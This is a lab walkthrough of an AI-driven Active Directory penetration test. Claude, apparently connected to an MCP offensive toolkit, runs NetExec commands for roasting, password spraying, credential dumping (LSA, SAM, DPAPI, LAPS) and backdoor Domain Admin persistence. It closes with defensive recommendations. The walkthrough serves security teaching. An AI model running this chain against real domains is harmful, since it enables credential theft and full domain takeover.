AI‑Driven Active Directory Penetration Testing: A Complete Step‑by‑Step Walkthrough

Overview

HexStrike AI exposes more than 150 offensive security tools via the Model Context Protocol (MCP). When Claude Desktop connects to the HexStrike AI MCP server, the AI acts as an operator: a natural‑language prompt selects the appropriate NetExec (nxc) module, fills in parameters, runs the command, and returns a structured result that can be copied directly into a penetration‑test report.

Lab Environment

Kali Linux workstation

Domain controller DC1 (192.168.1.7) and DC2 (192.168.1.11) running the ignite.local domain

Credentials used in the walk‑through

raaz / Password@1 – low‑privilege foothold

Administrator / Ignite@987 – obtained after password spraying

raj / Password@2 – reset during the attack, has LAPS read permission

All actions are performed with explicit permission in an isolated lab.

Installation and Server Startup

sudo apt install hexstrike-ai

The package pulls all required Python dependencies automatically. hexstrike_mcp The MCP server binds to 127.0.0.1:8888 and spawns a process pool for parallel tool execution. Keep this terminal open; stopping it disconnects Claude from all tools.

Claude Desktop Configuration

{
  "mcpServers": {
    "hexstrike-ai": {
      "command": "hexstrike_mcp",
      "args": ["--server", "http://127.0.0.1:8888"],
      "description": "HexStrike AI Security Tools",
      "timeout": 300
    }
  }
}

Save the file as ~/.config/Claude/claude_desktop_config.json and restart Claude Desktop to verify the connection.

Phase 1 – Reconnaissance

Enumerate Domain Users

nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --users

The command returns 23 accounts with annotations indicating AS‑REP‑roastable, Kerberoastable, and privileged‑group membership.

Enumerate Domain Groups

nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --groups

Key findings:

Krishna – non‑default admin

Ram – member of Backup Operators and Remote Management Users

Sita – holds Key Admins

Sanjeet – member of gMSA group

AS‑REP Roasting

nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --asreproast /tmp/asrep_ignite.txt --kdcHost 192.168.1.7

Account komal (UAC flag 0x400000, DONT_REQ_PREAUTH) is identified and its hash is saved to /tmp/asrep_ignite.txt.

Crack AS‑REP Hash

hashcat -m 18200 /tmp/asrep_ignite.txt /usr/share/wordlists/rockyou.txt

The password Password@1 is recovered in seconds, matching the low‑privilege credential and demonstrating credential‑reuse risk.

Kerberoasting

nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --kerberoasting /tmp/kerb_ignite.txt --kdcHost 192.168.1.7

Accounts raj and kavish yield RC4 (etype 23) tickets, ready for hashcat mode 13100.

adminCount Objects

nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --admin-count

Five objects (e.g., krishna , ram , sita ) are flagged, indicating stale privileged entries.

Pre‑Windows 2000 Computer Accounts

nxc ldap 192.168.1.7 -u raaz -p 'Password@1' -M pre2k --kdcHost 192.168.1.7

Account DEMO$ appears as a default‑password candidate.

Delegation Configuration

nxc ldap 192.168.1.11 -u raaz -p 'Password@1' --find-delegation

Four misconfigurations are discovered:

Constrained delegation for kavish (MSSQL SPN)

Unconstrained delegation on WIN‑SQL$

Two resource‑based constrained delegations pointing to DC$

Anti‑Virus / EDR Enumeration

nxc smb 192.168.1.7 -u raaz -p 'Password@1' -M enum_av

Only Windows Defender is present; no third‑party EDR.

User Description Field

nxc ldap 192.168.1.7 -u raaz -p 'Password@1' -M get-desc-users

Seven accounts contain descriptive notes that label each as a demonstration target (e.g., raj – Kerberoasting demo).

Domain Password Policy

nxc smb 192.168.1.7 -u raaz -p 'Password@1' --pass-pol

The policy has no account‑lockout threshold and a minimum length of 7 characters, enabling safe password spraying.

Computer Enumeration & Shared Folders

nxc ldap 192.168.1.11 -u raaz -p 'Password@1' --computers

Key hosts:

DC$ – RBCD target

WIN‑SQL$ – unconstrained delegation

MyGMSA$ – gMSA service account

MSEDGEWIN10$ – LAPS‑managed local admin

nxc smb 192.168.1.7 -u raaz -p 'Password@1' --shares

Shares ADMIN , IPC , SYSVOL are listed; C$ and D$ have write access.

Phase 2 – Exploitation

Zerologon (CVE‑2020‑1472) Check

nxc smb 192.168.1.11 -u raaz -p 'Password@1' -M zerologon

No vulnerable Netlogon is found, indicating the patch is applied.

SMBGhost (CVE‑2020‑0796) Check

nxc smb 192.168.1.11 -u raaz -p 'Password@1' -M smbghost

No vulnerability is reported.

NTLM Forced Authentication & Relay

nxc smb 192.168.1.11 -u raaz -p 'Password@1' -M coerce_plus

DFSCoerce, PetitPotam, PrinterBug and MSEven all report vulnerable, providing a forced‑authentication path to DCSync.

Password Spraying

nxc smb 192.168.1.7 -u users.txt -p 'Ignite@987' --continue-on-success

The spray succeeds on ignite.local\Administrator , granting full domain control without triggering lockout.

Post‑Exploitation Credential Harvesting

Disk enumeration : nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --disks Enable RDP :

nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' -M rdp -o ACTION=enable

Interactive RDP :

xfreerdp /v:192.168.1.7 /u:Administrator /p:'Ignite@987' /cert:ignore

Reset user password (raj) :

nxc winrm 192.168.1.7 -u Administrator -p 'Ignite@987' -x "net user raj Password@2 /domain"

Export LSA Secrets : nxc smb 192.168.1.11 -u Administrator -p 'Ignite@987' --lsa Export SAM : nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --sam Read LAPS password (using raj) : nxc ldap 192.168.1.7 -u raj -p 'Password@2' --laps Dump WinSCP sessions :

nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --winscp

DPAPI harvest :

nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --dpapi

Persistence

nxc winrm 192.168.1.7 -u Administrator -p 'Ignite@987' -x "net user nishant Password@2 /add /domain"

nxc winrm 192.168.1.7 -u Administrator -p 'Ignite@987' -x "net group \"Domain Admins\" nishant /add /domain"

A new domain user nishant with password Password@2 is created and added to Domain Admins , providing a durable back‑door.

Phase 3 – Post‑Exploitation Evidence Collection

nxc winrm 192.168.1.7 -u Administrator -p 'Ignite@987' -x "wevtutil qe Security /c:15 /rd:true /f:text"

Recent Security event logs are exported. Event 4662 with GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS‑Replication‑Get‑Changes) is highlighted as the DCSync detection artifact.

Command Cheat Sheet (selected NetExec commands)

SMB Commands

# Share enumeration
nxc smb 192.168.1.7 -u raaz -p 'Password@1' --shares

# User enumeration
nxc smb 192.168.1.7 -u raaz -p 'Password@1' --users

# Group enumeration
nxc smb 192.168.1.7 -u raaz -p 'Password@1' --groups

# Password policy
nxc smb 192.168.1.7 -u raaz -p 'Password@1' --pass-pol

# Disk enumeration (admin)
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --disks

# Enable RDP
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' -M rdp -o ACTION=enable

# Export LSA Secrets
nxc smb 192.168.1.11 -u Administrator -p 'Ignite@987' --lsa

# Export SAM
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --sam

# DPAPI dump
nxc smb 192.168.1.7 -u Administrator -p 'Ignite@987' --dpapi

LDAP Commands

# BloodHound full collection
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --bloodhound --collection All --dns-server 192.168.1.7

# Kerberoasting
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --kerberoasting /tmp/kerb.txt --kdcHost 192.168.1.7

# AS‑REP Roasting
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --asreproast /tmp/asrep.txt --kdcHost 192.168.1.7

# Delegation discovery
nxc ldap 192.168.1.11 -u raaz -p 'Password@1' --find-delegation

# adminCount objects
nxc ldap 192.168.1.7 -u raaz -p 'Password@1' --admin-count

# LAPS password read (using raj)
nxc ldap 192.168.1.7 -u raj -p 'Password@2' --laps

Defensive Recommendations

Set an account‑lockout threshold to break password‑spraying attacks.

Raise minimum password length to ≥14 characters and enforce complexity.

Remove the DONT_REQ_PREAUTH flag on all accounts to prevent AS‑REP Roasting.

Use long, random passwords for service accounts and enforce AES‑only encryption.

Regularly audit adminCount=1 objects and remove stale privileged entries.

Reset all Pre‑Windows 2000 computer accounts to non‑default passwords.

Never store secrets in the user description field; it is world‑readable.

Keep domain controllers patched (e.g., Zerologon, SMBGhost).

Mitigate NTLM forced‑authentication and relay attacks by enabling SMB signing, applying Extended Protection for Authentication (EPA), and restricting Print Spooler/DFS RPC interfaces.

Avoid saving credentials in applications like WinSCP; use key‑based authentication.

Do not browse the web or store personal credentials on domain controllers to reduce DPAPI exposure.

Restrict access to LSA/SAM/NTDS extraction tools and monitor their usage.

Lock down LAPS ACLs to only required roles and audit delegated password‑reset rights.

Deploy a tamper‑resistant EDR on DCs rather than relying solely on Windows Defender.

Alert on changes to fDenyTSConnections and on suspicious WinRM/WMI executions.

Generate high‑confidence alerts for Event 4720 (user creation) and 4728/4732 (privileged group addition).

Detect DCSync activity by flagging Event 4662 with the replication GUID when the source account is not a DC.

Conclusion

The walk‑through demonstrates a complete Active Directory attack chain—from read‑only enumeration to Domain Admin takeover, credential exfiltration, persistence, and evidence collection—entirely driven by natural‑language prompts to HexStrike AI and executed by NetExec. By mirroring each offensive step with corresponding defensive detections, the article highlights both the power of AI‑assisted red teaming and the concrete controls defenders must implement to detect and mitigate such automated attacks.